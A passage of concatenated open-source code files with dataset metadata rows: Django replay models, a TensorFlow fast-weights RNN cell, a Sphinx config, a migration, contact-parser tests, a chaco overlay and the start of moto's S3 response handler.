online_id=self.online_id if PLATFORMS_MAPPINGS[self.platform] == PLATFORM_STEAM else self.player_name,
playlist=self.replay.playlist,
)
if not rating:
return {
'image': static('img/tiers/icons/0.png'),
'tier_name': tier_name(0)
}
return {
'image': static('img/tiers/icons/{}.png'.format(rating.tier)),
'tier_name': tier_name(rating.tier)
}
except LeagueRating.DoesNotExist:
pass
return {
'image': static('img/tiers/icons/0.png'),
'tier_name': 'Unranked'
}
@cached_property
def vehicle_data(self):
"""
{
"RocketTrail": {"Name": "Boost_HolyLight", "Id": 44},
"Topper": {"Name": "Hat_Tiara", "Id": 495},
"Version": 12,
"Wheels": {"Name": "WHEEL_Atlantis", "Id": 359},
"Body": {"Name": "Body_Force", "Id": 22},
"Antenna": {"Name": null, "Id": 0},
"Decal": {"Name": "Skin_Force_Junk", "Id": 1178},
"Unknown2": 0,
"Unknown1": 0
}
"""
components = {}
if not self.vehicle_loadout:
return components
if type(self.vehicle_loadout) == list:
"""
[
403, # Body
0, # Decal. 330 = Flames
376, # Wheels. 386 = Christiano, 376 = OEM
63, # Rocket Trail. 578 = Candy Corn
0, # Antenna. 1 = 8-Ball
0, # Topper. 796 = Deadmau5
0 #
],
"""
if len(self.vehicle_loadout) == 9:
self.vehicle_loadout = self.vehicle_loadout[1:-1]
assert len(self.vehicle_loadout) == 7
component_maps = [
'body',
'decal',
'wheels',
'trail',
'antenna',
'topper',
]
for index, component in enumerate(self.vehicle_loadout):
if component > 0:
get_component = Component.objects.filter(
type=component_maps[index],
internal_id=component,
)
if get_component.exists():
components[component_maps[index]] = get_component[0]
else:
components[component_maps[index]] = Component.objects.create(
type=component_maps[index],
internal_id=component,
name='Unknown',
)
elif type(self.vehicle_loadout) == dict:
component_maps = {
'Body': {'type': 'body', 'replace': 'Body_'},
'Decal': {'type': 'decal', 'replace': 'Skin_'},
'Wheels': {'type': 'wheels', 'replace': 'WHEEL_'},
'RocketTrail': {'type': 'trail', 'replace': 'Boost_'},
'Antenna': {'type': 'antenna', 'replace': 'Antenna '},
'Topper': {'type': 'topper', 'replace': 'Hat_'},
}
for component_type, mappings in component_maps.items():
if component_type in self.vehicle_loadout and self.vehicle_loadout[component_type]['Name']:
try:
components[mappings['type']] = Component.objects.get_or_create(
type=mappings['type'],
internal_id=self.vehicle_loadout[component_type]['Id'],
defaults={
'name': self.vehicle_loadout[component_type]['Name'].replace(mappings['replace'], '').replace('_', ' ')
}
)[0]
if components[mappings['type']].name == 'Unknown':
components[mappings['type']].name = self.vehicle_loadout[component_type]['Name'].replace(mappings['replace'], '').replace('_', ' ')
components[mappings['type']].save()
except Exception:
pass
return components
def get_absolute_url(self):
if self.bot or self.platform == '0' or not self.platform:
return '#1'
try:
return reverse('users:player', kwargs={
'platform': PLATFORMS_MAPPINGS[self.platform],
'player_id': self.online_id if int(self.platform) == PLATFORM_STEAM else self.player_name,
})
except Exception:
return '#2'
def __str__(self):
return '{} on Team {}'.format(
self.player_name,
self.team,
)
class Meta:
ordering = ('team', '-score', 'player_name')
class Goal(models.Model):
replay = models.ForeignKey(
Replay,
db_index=True,
)
# Goal 1, 2, 3 etc..
number = models.PositiveIntegerField()
player = models.ForeignKey(
Player,
db_index=True,
)
frame = models.IntegerField(
blank=True,
null=True,
)
@cached_property
def goal_time(self):
if not self.frame or not self.replay.record_fps:
return 'N/A'
calculation = self.frame / self.replay.record_fps
minutes, seconds = divmod(calculation, 60)
return '%d:%02d' % (
int(minutes),
int(seconds),
)
def __str__(self):
try:
return 'Goal {} by {}'.format(
self.number,
self.player,
)
except Player.DoesNotExist:
return 'Goal {}'.format(
self.number,
)
class Meta:
ordering = ['frame']
class ReplayPack(models.Model):
title = models.CharField(
max_length=50,
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
db_index=True,
)
replays = models.ManyToManyField(
Replay,
blank=True,
)
file = models.FileField(
upload_to='uploads/replaypack_files',
blank=True,
null=True,
)
date_created = models.DateTimeField(
auto_now_add=True,
)
last_updated = models.DateTimeField(
auto_now=True,
)
@cached_property
def maps(self):
maps = Map.objects.filter(
id__in=set(self.replays.values_list('map_id', flat=True))
).values_list('title', flat=True)
return ', '.join(maps)
@cached_property
def goals(self):
if not self.replays.count():
return 0
return self.replays.aggregate(
num_goals=models.Sum(models.F('team_0_score') + models.F('team_1_score'))
)['num_goals']
@cached_property
def players(self):
return set(Player.objects.filter(
replay_id__in=self.replays.values_list('id', flat=True),
).values_list('player_name', flat=True))
@cached_property
def total_duration(self):
calculation = 0
if self.replays.count():
calculation = self.replays.aggregate(models.Sum('num_frames'))['num_frames__sum'] / 30
minutes, seconds = divmod(calculation, 60)
hours, minutes = divmod(minutes, 60)
return '{} {}m {}s'.format(
'{}h'.format(int(hours)) if hours > 0 else '',
int(minutes),
int(seconds),
)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('replaypack:detail', kwargs={
'pk': self.pk,
})
class Meta:
ordering = ['-last_updated', '-date_created']
class BoostData(models.Model):
replay = models.ForeignKey(
Replay,
db_index=True,
)
player = models.ForeignKey(
Player,
)
frame = models.PositiveIntegerField()
value = models.PositiveIntegerField(
validators=[MinValueValidator(0), MaxValueValidator(255)]
)
class Meta:
ordering = ['player', 'frame']
# unique_together = [('player', 'frame', 'value')]
class Component(models.Model):
type = models.CharField(
max_length=8,
choices=[
('trail', 'Trail'),
('antenna', 'Antenna'),
('wheels', 'Wheels'),
('decal', 'Decal'),
('body', 'Body'),
('topper', 'Topper')
],
default='body',
)
internal_id = models.PositiveIntegerField()
name = models.CharField(
max_length=100,
default='Unknown',
)
| gpl-3.0 | 6,570,715,833,901,000,000 | 24.839542 | 159 | 0.536741 | false |
jxwufan/AssociativeRetrieval | FastWeightsRNN.py | 1 | 4632 | """
Fast Weights Cell.
Ba et al. Using Fast Weights to Attend to the Recent Past
https://arxiv.org/abs/1610.06258
"""
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import tf_logging as logging
from tensorflow.contrib.layers.python.layers import layer_norm
from tensorflow.python.util import nest
import tensorflow as tf
import numpy as np
class LayerNormFastWeightsBasicRNNCell(rnn_cell.RNNCell):
def __init__(self, num_units, forget_bias=1.0, reuse_norm=False,
input_size=None, activation=nn_ops.relu,
layer_norm=True, norm_gain=1.0, norm_shift=0.0,
loop_steps=1, decay_rate=0.9, learning_rate=0.5,
dropout_keep_prob=1.0, dropout_prob_seed=None):
if input_size is not None:
logging.warn("%s: The input_size parameter is deprecated.", self)
self._num_units = num_units
self._activation = activation
self._forget_bias = forget_bias
self._reuse_norm = reuse_norm
self._keep_prob = dropout_keep_prob
self._seed = dropout_prob_seed
self._layer_norm = layer_norm
self._S = loop_steps
self._eta = learning_rate
self._lambda = decay_rate
self._g = norm_gain
self._b = norm_shift
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def _norm(self, inp, scope=None):
reuse = tf.get_variable_scope().reuse
with vs.variable_scope(scope or "Norm") as scope:
normalized = layer_norm(inp, reuse=reuse, scope=scope)
return normalized
def _fwlinear(self, args, output_size, scope=None):
if args is None or (nest.is_sequence(args) and not args):
raise ValueError("`args` must be specified")
if not nest.is_sequence(args):
args = [args]
assert len(args) == 2
assert args[0].get_shape().as_list()[1] == output_size
dtype = [a.dtype for a in args][0]
with vs.variable_scope(scope or "Linear"):
matrixW = vs.get_variable(
"MatrixW", dtype=dtype, initializer=tf.convert_to_tensor(np.eye(output_size, dtype=np.float32) * .05))
matrixC = vs.get_variable(
"MatrixC", [args[1].get_shape().as_list()[1], output_size], dtype=dtype)
res = tf.matmul(args[0], matrixW) + tf.matmul(args[1], matrixC)
return res
def zero_fast_weights(self, batch_size, dtype):
"""Return zero-filled fast_weights tensor(s).
Args:
batch_size: int, float, or unit Tensor representing the batch size.
dtype: the data type to use for the state.
Returns:
A zero filled fast_weights of shape [batch_size, state_size, state_size]
"""
state_size = self.state_size
zeros = array_ops.zeros(
array_ops.pack([batch_size, state_size, state_size]), dtype=dtype)
zeros.set_shape([None, state_size, state_size])
return zeros
def _vector2matrix(self, vector):
memory_size = vector.get_shape().as_list()[1]
return tf.reshape(vector, [-1, memory_size, 1])
def _matrix2vector(self, matrix):
return tf.squeeze(matrix, [2])
def __call__(self, inputs, state, scope=None):
state, fast_weights = state
with vs.variable_scope(scope or type(self).__name__) as scope:
"""Compute Wh(t) + Cx(t)"""
linear = self._fwlinear([state, inputs], self._num_units, False)
"""Compute h_0(t+1) = f(Wh(t) + Cx(t))"""
if not self._reuse_norm:
h = self._activation(self._norm(linear, scope="Norm0"))
else:
h = self._activation(self._norm(linear))
h = self._vector2matrix(h)
linear = self._vector2matrix(linear)
for i in range(self._S):
"""
Compute h_{s+1}(t+1) = f([Wh(t) + Cx(t)] + A(t) h_s(t+1)), S times.
See Eqn (2) in the paper.
"""
if not self._reuse_norm:
h = self._activation(self._norm(linear +
math_ops.batch_matmul(fast_weights, h), scope="Norm%d" % (i + 1)))
else:
h = self._activation(self._norm(linear +
math_ops.batch_matmul(fast_weights, h)))
"""
Compute A(t+1) according to Eqn (4)
"""
state = self._vector2matrix(state)
new_fast_weights = self._lambda * fast_weights + self._eta * math_ops.batch_matmul(state, state, adj_y=True)
h = self._matrix2vector(h)
return h, (h, new_fast_weights)
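

# A minimal single-step usage sketch (not part of the original module): the
# batch size, input size and unit count below are arbitrary assumptions, and
# the tuple state (h, A) is passed explicitly rather than through
# tf.nn.dynamic_rnn.
if __name__ == "__main__":
  batch_size, input_size, num_units = 32, 26, 50
  cell = LayerNormFastWeightsBasicRNNCell(num_units)
  inputs = tf.placeholder(tf.float32, [batch_size, input_size])
  # Initial slow state h(0) and fast weights A(0) are simply zeros.
  h0 = tf.zeros([batch_size, num_units])
  a0 = cell.zero_fast_weights(batch_size, tf.float32)
  # One step of the cell returns the new hidden state and the updated fast weights.
  output, (h1, a1) = cell(inputs, (h0, a0))
  print(output)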
| apache-2.0 | -2,072,723,172,511,365,600 | 33.311111 | 114 | 0.62975 | false |
murphycj/AGFusion | doc/conf.py | 1 | 9896 | # -*- coding: utf-8 -*-
#
# AGFusion documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 10 11:07:09 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'AGFusion'
copyright = '2016, Charlie Murphy'
author = 'Charlie Murphy'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'AGFusion v0.1'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AGFusiondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AGFusion.tex', 'AGFusion Documentation',
'Charlie Murphy', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'agfusion', 'AGFusion Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AGFusion', 'AGFusion Documentation',
author, 'AGFusion', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| mit | 5,436,764,078,029,414,000 | 27.518732 | 80 | 0.691795 | false |
xkmato/casepro | casepro/msgs/migrations/0053_faq.py | 1 | 1113 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orgs', '0016_taskstate_is_disabled'),
('msgs', '0052_triggers'),
]
operations = [
migrations.CreateModel(
name='FAQ',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('question', models.CharField(max_length=255)),
('answer', models.TextField()),
('language', models.CharField(help_text='Language for this FAQ', max_length=3, null=True, verbose_name='Language', blank=True)),
('labels', models.ManyToManyField(help_text='Labels assigned to this FAQ', related_name='faqs', to='msgs.Label')),
('org', models.ForeignKey(related_name='faqs', verbose_name='Organization', to='orgs.Org')),
('parent', models.ForeignKey(related_name='translations', blank=True, to='msgs.FAQ', null=True)),
],
),
]
| bsd-3-clause | 3,345,618,433,227,566,000 | 40.222222 | 144 | 0.585804 | false |
praekelt/vumi-go | go/contacts/parsers/test_parsers.py | 1 | 7412 | from os import path
from go.vumitools.tests.helpers import djangotest_imports
parser_classes = ['CSVFileParser', 'XLSFileParser']
with djangotest_imports(globals(), dummy_classes=parser_classes):
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from go.base.tests.helpers import GoDjangoTestCase
from go.contacts.parsers import ContactParserException
from go.contacts.parsers.csv_parser import CSVFileParser
from go.contacts.parsers.xls_parser import XLSFileParser
class ParserTestCase(GoDjangoTestCase):
def setUp(self):
self.parser = self.PARSER_CLASS()
def fixture(self, fixture_name):
fixture_path = path.join(settings.PROJECT_ROOT, 'base', 'fixtures',
fixture_name)
content_file = ContentFile(open(fixture_path, 'r').read())
fpath = default_storage.save('tmp/%s' % (fixture_name,), content_file)
self.add_cleanup(default_storage.delete, fpath)
return fpath
class TestCSVParser(ParserTestCase):
PARSER_CLASS = CSVFileParser
def test_guess_headers_and_row_without_headers(self):
csv_file = self.fixture('sample-contacts.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'name': 'Name 1',
'surname': 'Surname 1',
'msisdn': '+27761234561',
})
def test_guess_headers_and_row_with_key_header(self):
csv_file = self.fixture('sample-contacts-with-key-header.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'key': 'foo',
'surname': 'Surname 1',
})
def test_guess_headers_and_row_one_column_with_plus(self):
csv_file = self.fixture('sample-contacts-one-column-with-plus.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {'msisdn': '+27761234561'})
def test_contacts_parsing(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'surname': 'Surname 2',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_none_entries(self):
csv_file = self.fixture('sample-contacts-with-headers-and-none.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_missing_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-missing-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: not enough fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
def test_contacts_with_extra_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-extra-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: too many fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
class TestXLSParser(ParserTestCase):
PARSER_CLASS = XLSFileParser
def test_guess_headers_and_row_without_headers(self):
xls_file = self.fixture('sample-contacts.xls')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertTrue('mathare-kiamaiko' in known_headers)
self.assertTrue('baba dogo' in known_headers)
self.assertTrue('mathare-kiamaiko' in sample_row)
self.assertTrue('baba dogo' in sample_row)
def test_contacts_parsing(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
contacts = list(self.parser.parse_file(xls_file, zip(
['name', 'surname', 'msisdn'],
['string', 'integer', 'number']), has_header=True))
self.assertEqual(contacts[0], {
'msisdn': '1.0',
'surname': '2',
'name': 'xxx'})
| bsd-3-clause | 2,594,425,094,356,202,500 | 39.282609 | 78 | 0.584188 | false |
USGSDenverPychron/pychron | pychron/graph/guide_overlay.py | 1 | 3622 | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from chaco.api import AbstractOverlay
from enable.colors import ColorTrait
from enable.enable_traits import LineStyle
from enable.label import Label
from enable.tools.drag_tool import DragTool
from traits.api import Enum, Float, Instance
# =============standard library imports ========================
# =============local library imports ==========================
class GuideOverlayMoveTool(DragTool):
hit_length = 5
def is_draggable(self, x, y):
ov = self.overlay
if ov.orientation == 'v':
mapper = ov.component.index_mapper
cv = x
else:
mapper = ov.component.value_mapper
cv = y
v = mapper.map_screen(ov.value)
return abs(cv - v) < self.hit_length
def dragging(self, event):
ov = self.overlay
if ov.orientation == 'v':
v = event.x
mapper = ov.component.index_mapper
else:
v = event.y
mapper = ov.component.value_mapper
ov.value = mapper.map_data(v)
ov.display_value = True
ov.label_position = (event.x + 5, event.y + 5)
ov.invalidate_and_redraw()
def drag_end(self, event):
self.overlay.display_value = False
self.overlay.invalidate_and_redraw()
def drag_cancel(self, event):
self.drag_end(event)
class GuideOverlay(AbstractOverlay):
"""
draws a horizontal or vertical line at the specified value
"""
orientation = Enum('h', 'v')
value = Float
color = ColorTrait("red")
line_style = LineStyle('dash')
line_width = Float(1)
display_value = False
label = Instance(Label, ())
def overlay(self, component, gc, view_bounds=None, mode='normal'):
with gc:
gc.clip_to_rect(component.x, component.y, component.width, component.height)
with gc:
gc.set_line_dash(self.line_style_)
gc.set_line_width(self.line_width)
gc.set_stroke_color(self.color_)
gc.begin_path()
if self.orientation == 'h':
x1 = component.x
x2 = component.x2
y1 = y2 = component.value_mapper.map_screen(self.value)
else:
y1 = component.y
y2 = component.y2
x1 = x2 = component.index_mapper.map_screen(self.value)
gc.move_to(x1, y1)
gc.line_to(x2, y2)
gc.stroke_path()
if self.display_value:
with gc:
l = self.label
l.text = '{:0.5f}'.format(self.value)
l.position = self.label_position
l.draw(gc)
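
# A rough usage sketch (not from the original module; `plot` stands in for an
# existing chaco Plot or component):
#
#     guide = GuideOverlay(component=plot, orientation='h', value=0.5)
#     plot.overlays.append(guide)
#     tool = GuideOverlayMoveTool(component=plot)
#     tool.overlay = guide
#     plot.tools.append(tool)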
# ============= EOF =====================================
| apache-2.0 | -3,389,673,578,266,769,000 | 31.630631 | 88 | 0.532579 | false |
kefo/moto | moto/s3/responses.py | 1 | 49976 | from __future__ import unicode_literals
import re
import six
from moto.core.utils import str_to_rfc_1123_datetime
from six.moves.urllib.parse import parse_qs, urlparse
import xmltodict
from moto.core.responses import _TemplateEnvironmentMixin
from moto.s3bucket_path.utils import bucket_name_from_url as bucketpath_bucket_name_from_url, parse_key_name as bucketpath_parse_key_name, is_delete_keys as bucketpath_is_delete_keys
from .exceptions import BucketAlreadyExists, S3ClientError, MissingBucket, MissingKey, InvalidPartOrder
from .models import s3_backend, get_canned_acl, FakeGrantee, FakeGrant, FakeAcl, FakeKey, FakeTagging, FakeTagSet, FakeTag
from .utils import bucket_name_from_url, metadata_from_headers
from xml.dom import minidom
REGION_URL_REGEX = r'\.s3-(.+?)\.amazonaws\.com'
DEFAULT_REGION_NAME = 'us-east-1'
def parse_key_name(pth):
return pth.lstrip("/")
def is_delete_keys(request, path, bucket_name):
return path == u'/?delete' or (
path == u'/' and
getattr(request, "query_string", "") == "delete"
)
class ResponseObject(_TemplateEnvironmentMixin):
def __init__(self, backend):
super(ResponseObject, self).__init__()
self.backend = backend
@property
def should_autoescape(self):
return True
def all_buckets(self):
# No bucket specified. Listing all buckets
all_buckets = self.backend.get_all_buckets()
template = self.response_template(S3_ALL_BUCKETS)
return template.render(buckets=all_buckets)
def subdomain_based_buckets(self, request):
host = request.headers.get('host', request.headers.get('Host'))
if not host:
host = urlparse(request.url).netloc
if not host or host.startswith("localhost") or re.match(r"^[^.]+$", host):
# For localhost or local domain names, default to path-based buckets
return False
match = re.match(r'^([^\[\]:]+)(:\d+)?$', host)
if match:
match = re.match(r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}',
match.groups()[0])
if match:
return False
match = re.match(r'^\[(.+)\](:\d+)?$', host)
if match:
match = re.match(r'^(((?=.*(::))(?!.*\3.+\3))\3?|[\dA-F]{1,4}:)([\dA-F]{1,4}(\3|:\b)|\2){5}(([\dA-F]{1,4}(\3|:\b|$)|\2){2}|(((2[0-4]|1\d|[1-9])?\d|25[0-5])\.?\b){4})\Z',
match.groups()[0], re.IGNORECASE)
if match:
return False
path_based = (host == 's3.amazonaws.com' or re.match(
r"s3[\.\-]([^.]*)\.amazonaws\.com", host))
return not path_based
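
    # Illustrative outcomes (sketch): 'mybucket.s3.amazonaws.com' -> True
    # (virtual-hosted style buckets); 's3.amazonaws.com', 'localhost:5000' and
    # '192.168.0.1:8080' -> False (path-style buckets).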
def is_delete_keys(self, request, path, bucket_name):
if self.subdomain_based_buckets(request):
return is_delete_keys(request, path, bucket_name)
else:
return bucketpath_is_delete_keys(request, path, bucket_name)
def parse_bucket_name_from_url(self, request, url):
if self.subdomain_based_buckets(request):
return bucket_name_from_url(url)
else:
return bucketpath_bucket_name_from_url(url)
def parse_key_name(self, request, url):
if self.subdomain_based_buckets(request):
return parse_key_name(url)
else:
return bucketpath_parse_key_name(url)
def ambiguous_response(self, request, full_url, headers):
# Depending on which calling format the client is using, we don't know
